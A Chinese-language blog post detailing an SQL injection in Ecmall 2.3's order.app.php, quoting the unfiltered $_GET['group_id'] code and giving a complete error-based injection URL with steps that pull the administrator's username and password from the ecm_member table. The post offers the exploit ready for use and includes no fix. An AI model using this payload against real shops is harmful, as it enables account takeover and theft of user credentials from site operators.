漏洞出现在order.app.php文件团购后下订单时 没有对 $_GET['group_id']进行过滤    

function _clear_goods($order_id)

    {

        switch ($_GET['goods'])

        {

            case 'groupbuy':

                /* 团购的商品 */

                $model_groupbuy =& m('groupbuy');

                $model_groupbuy->updateRelation('be_join', $_GET['group_id'], $this->visitor->get('user_id'), array(

                    'order_id'  => $order_id,

                ));//这里没有对$_GET['group_id']进行过滤

            break;

     

        }

    }

 

  首先参加一个团购活动,当团购活动结束后,点击购买 Ecmall 2.3版本存SQL注入 – 网站安全 – 自学php插图   点下一步时,更改当前网址如:     http://0day5.com/index.php?app=order&goods=groupbuy&group_id=2 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23
Ecmall 2.3版本存SQL注入 – 网站安全 – 自学php插图1 然后点击"下单完成并支付"将会出现注入信息,如管理员账号密码等 Ecmall 2.3版本存SQL注入 – 网站安全 – 自学php插图2

    上一篇: 使用NetCat或BASH创建反向Shell来执行远程Root命令

    下一篇: 天天团购可查看任意用户信息(订单号可算出) -
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《Ecmall 2.3版本存SQL注入 – 网站安全 – 自学php
   

还没有人抢沙发呢~